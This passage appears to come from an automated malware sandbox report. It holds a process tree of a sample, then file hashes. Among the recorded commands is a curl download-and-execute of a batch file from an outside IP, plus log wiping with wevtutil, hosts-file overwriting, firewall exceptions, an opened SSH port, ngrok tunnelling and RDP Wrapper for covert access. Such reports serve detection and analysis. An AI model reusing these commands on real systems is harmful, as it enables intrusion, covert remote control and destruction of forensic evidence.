                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F8968626-3414-436A-BBD3-D88456FCCDEE\dismhost.exe {ABEAF7D4-C56A-488F-8743-53BA106065BB}
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    PID:2792
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell Set-Service -Name sshd -StartupType 'Automatic'
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  PID:1568
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell Start-Service sshd
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3748
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:3384
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5168
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6340 /prefetch:8
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4616
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6892 /prefetch:8
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        PID:3324
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6924 /prefetch:2
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        PID:4824
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5848
                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:1
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5856
                                                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:2032
                                                                                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:4080
                                                                                                                                                                                                            • C:\Windows\system32\notepad.exe
                                                                                                                                                                                                              "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:1080
                                                                                                                                                                                                              • C:\ProgramData\Windata\winlogin.exe
                                                                                                                                                                                                                C:\ProgramData\Windata\winlogin.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:1444
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del %programdata%\Windata\update.bat && curl http://152.89.239.119/update.bat -o %programdata%\Windata\update.bat && cmd /C %programdata%\Windata\update.bat
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  PID:4816
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\curl.exe
                                                                                                                                                                                                                    curl http://152.89.239.119/update.bat -o C:\ProgramData\Windata\update.bat
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4500
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd /C C:\ProgramData\Windata\update.bat
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      PID:5272
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        cmd /C "attrib -r c:\Windows\System32\Drivers\etc\hosts"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                        PID:5292
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                          attrib -r c:\Windows\System32\Drivers\etc\hosts
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                          PID:5308
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        cmd /C "echo 197.206.92.151 262626.ddns.net > c:\Windows\System32\Drivers\etc\hosts"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                        PID:5328
                                                                                                                                                                                                                • C:\ProgramData\Windata\WindowsUpdate.exe
                                                                                                                                                                                                                  C:\ProgramData\Windata\WindowsUpdate.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  PID:3360
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C %programdata%\Windata\ngrok.exe start --all
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:4764
                                                                                                                                                                                                                    • C:\ProgramData\Windata\ngrok.exe
                                                                                                                                                                                                                      C:\ProgramData\Windata\ngrok.exe start --all
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:1580
                                                                                                                                                                                                                • C:\ProgramData\Windata\srlhost.exe
                                                                                                                                                                                                                  C:\ProgramData\Windata\srlhost.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                  PID:4068
                                                                                                                                                                                                                • C:\ProgramData\Windata\smhost.exe
                                                                                                                                                                                                                  C:\ProgramData\Windata\smhost.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:3300
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                    netsh firewall add allowedprogram "C:\ProgramData\Windata\smhost.exe" "smhost.exe" ENABLE
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:5812
                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4916
                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:5392
                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:5348
                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:2428
                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:5700
                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:2472
                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:1072
                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:692
                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:2280
                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      PID:5988
                                                                                                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2472
                                                                                                                                                                                                                      • C:\Windows\System32\OpenSSH\sshd.exe
                                                                                                                                                                                                                        C:\Windows\System32\OpenSSH\sshd.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:5964
                                                                                                                                                                                                                          • C:\Windows\System32\OpenSSH\ssh-keygen.exe
                                                                                                                                                                                                                            ssh-keygen -A
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:5992

                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                          • C:\Program Files\RDP Wrapper\rdpwrap.ini

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            132KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            d3c90f02de548c8dea592f6d2a0e3feb

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            3c70944d08059e1fd4be347c8a56dddf41a63f16

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            c0055252f5a1e8f3d9750cebdefee565b160b572ac6977917c78bd5452802ebb

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            6a0164d5780f1af9582fb2a328c3134f5cba4c50b905d5c9216ea22eb3f5475846599c0e98e1a9d98bf5002ecd1c6975087ef85089b1823482ca15ee20ad89ec

                                                                                                                                                                                                                          • C:\ProgramData\Windata\hrdp.zip

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            0220e75b22e87585fa065121761e9e2d

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            3c2b019c4bde007ffca05bca8b75ad3951a4a9a0

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            6acb1127d03b01b533501943a559e2ef33be1788cbf9b64d5617ae5ccba92446

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            fc15b01b0e13f0288f49e70c5294a3643dda73edd2ed48697b61f0f445379e189a41d626e650644f50e71d04543a67d68592f7ce4d057e6eeaa5aff25ce1bc07

                                                                                                                                                                                                                          • C:\ProgramData\Windata\hrdp\RDPWInst.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            3288c284561055044c489567fd630ac2

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                                                                                                                                                                                          • C:\ProgramData\Windata\hrdp\install.bat

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            467B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            9452c0d63dc4f88da0481614140e79fd

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            29438e77698d93b2766a363f990addc4499366be

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            9db73248dc3ab80f2cde20a5181d572eeac056e9ce79b21c866498c34fe62ce3

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            1fce942c4b5f2cf905eddd34ec59b254e8f8b27d970e407e2a3c880397dba5b3a058c27cccdfa3447a1856eb2288d6e4f66dec1a8b2db71a9214e904e47a1df4

                                                                                                                                                                                                                          • C:\ProgramData\Windata\ngrok.zip

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            8.4MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            ef99156228bf3926729f9682cef708e9

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            7e02bd51e5be7e98454434c030e6cc583876f63b

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            dc28f606067f7fe980c033c27d7365ed761dce0ad398095e495fdfd26e0b4f51

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            033bd685dd744c5de93be64d221a41d06224261a28401d7a125db4824c22814eb410903a162e946fcc3dfe386b164759c276dc6b264c307cfdf295441f28cef1

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            152B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            f9664c896e19205022c094d725f820b6

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            f8f1baf648df755ba64b412d512446baf88c0184

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            7121d84202a850791c2320385eb59eda4d697310dc51b1fcd4d51264aba2434e

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            3fa5d2c68a9e70e4a25eaac2095171d87c741eec2624c314c6a56f4fa390d6319633bf4c48b1a4af7e9a0451f346beced9693da88cfc7bcba8dfe209cbd1b3ae

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            152B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            847d47008dbea51cb1732d54861ba9c9

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            f2099242027dccb88d6f05760b57f7c89d926c0d

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            10292fa05d896a2952c1d602a72d761d34bc776b44d6a7df87e49b5b613a8ac1

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            bd1526aa1cc1c016d95dfcc53a78b45b09dde4ce67357fc275ab835dbe1bb5b053ca386239f50cde95ad243a9c1bbb12f7505818577589beecc6084f7b94e83f

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            984B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            078b01fedc34ff3e851b72d5a2a97991

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            96e87df9f2738b2f7cbea631b6a9dad6c123ea18

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            4f1f15c1765afabc3281d690499d92f389530a865c7ea0630dc85875c14cf106

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            2e7f610f3becb9da1c8b40e1687615d8c2265ef1a347ae2cdd760395602f5901ef2c286eb86afa0ad0bacdc527eacf0dce2c842755c57f4d16b3a8254edd2948

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            380B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            b7a794ca9b7387f7068d9c94947a9abf

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            de6e5ef2967e492a846f62bdee502431602f254c

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            59a4a3aa9b33fb018861ee9dbefe531a2beaea27b2711accc329f0e515fab1cc

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            7c305e8dfafd210e32daa85574ceec61b951090b8c857e3973901a674701f466a2b10008d02718f5b63b080647d6eead2b83c00360c8e267902a89c0e1c8e8f3

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            868B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            40e9f19177ef430751e84f10a6e1ba56

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            ca86be73fbf1cf5f39b25d4425ebc1f7c23596e5

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            3d319e6efb048b84119f7cdd1121d9168e2bbd5da1dc1f34cc781b97d8b11b14

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            ef244ed362e059729b926cf588ce0543864ba33df57e479018a0629b9402ff9802475d91f472d21d4ff75d4d6291b03af5ac5a506ca7b98c57b354c7d2a88df3

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            6KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            63320375d707a3d42109ac49d6956c4d

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            a030d515745397be5c6eb02dcdc27450e78e779d

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            0e57191471d17bbc8ceeefcd80d344982393aa7c9deaf783da3d7269732e3399

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            f0e8f02ee363d93ced7100997ecd1362c70bfb1b40f2d079fbaec177119a89f60cc2a461a68072418fac9f368c5b0458518856db5e06fa09b4399fe295e1371c

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            6KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            995850accc7f3a340c28a8f79365c00e

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            9e169de3b851fdf4bad38f38317435fcc1f39a3f

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            82fe6d5d014c681d45db971025ab0ebf18d37eafcd385fb3d23d40e2f5b05fb9

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            7d68aaaf04031e50d908781f2d5cc05dfccfa158b729641a370d3a17c7d27e588af04c2fb18145ae1491ab2d283cef25d9e25e9538c53c3cef8411a113f39387

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            94fee34863afb67c36da09bc71687ee1

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            f37d38d2a6f9259e423273ac7d16ad2e5cdad2a6

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            a506780bccbd540424740f06f3f8e1b35cba80a6a0170c0dbcc702e5397a4d09

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            84db7a50b2b50136aaaf16de89a8e2da81fd716847a190001c860817453434fa69acf06df3dd93763320734c6b78ea8766fdffe39f98079c8397a7b308f9b7b7

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            37346b0606f33f5bc78a0f35745dc765

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            0d35754206b79876507f6d8a4ece678f6b7e9f3b

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            948bf99504ebde0e2cce39b0ecbfdc0fa485115f91da646d36107a9f8647cd6f

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            3fe0d5ab804ee73c0fe9286dcf00e0502b443999c5ad1d6ee43b61c627a2d4767a59aded045187f4347fbd901011f6c9651d684b6f1497d5c173c37fbc4427a3

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            6KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            9530fc372d1bab13fb047e8cfb0e8e9d

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            1ea66eebb479d8052d50c8ff3fc6c7d9158a3ecd

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            d249b2634250bea1ba8f86f8f561683741cb0e4b7254c7064aab5b0453bedaa2

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            f5a169eed2cc57b0db8d1f2243b20a8cbbb1b878b4477596e0ac2000083b6b972406e05173a224d85389ee9a10b4c11e9e14ac9ae1a25086b63b88d682145a98

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            16B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e173761c-6616-43a4-b319-bfbc2f6231a8.tmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            947818cf253517855ee3d13f1d96fa4e

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            4bd4c8f30f61384c3ffe8a93a01683214763ae77

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            7f4624c293212b0215f9fb3768b776abf544f971269cc8c8e5786f10428cc021

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            bca3ea4d4d447f30a975f1b0c3f0c1ff49e6f5626f33289d2c89b288b0c26d68253d8d8aa3cafa9b894cf1e2b7c9284d8a86c6ad54f9f4c2e421b30e41321157

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            10KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            0f6504277d288ecec56ffb07227a5d45

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            a94509b5987d43c2e2f676f7ffe1ef5828f8419e

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            a9c9e9347528423f947898f297ad1ac7b6ed1794d504ca26b2007b4c36a70830

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            5e528826be3b986d4218436be5789df29a9b0f0674a618df706b68c574014ed7eb5522119e953a8461526d1a90e35fc78fc5813f67bde395aee7ef8b4ab40cd0

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            d06d00300260a1c407604deb6131ea35

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            09427220a24f3a3783dc38915603f3614c3deedf

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            cb5d6f0089b890ea8928167b8773f45f197d0bda81b6b3d3a03bc4c27940add2

                                                                                                                                                                                                                            SHA512

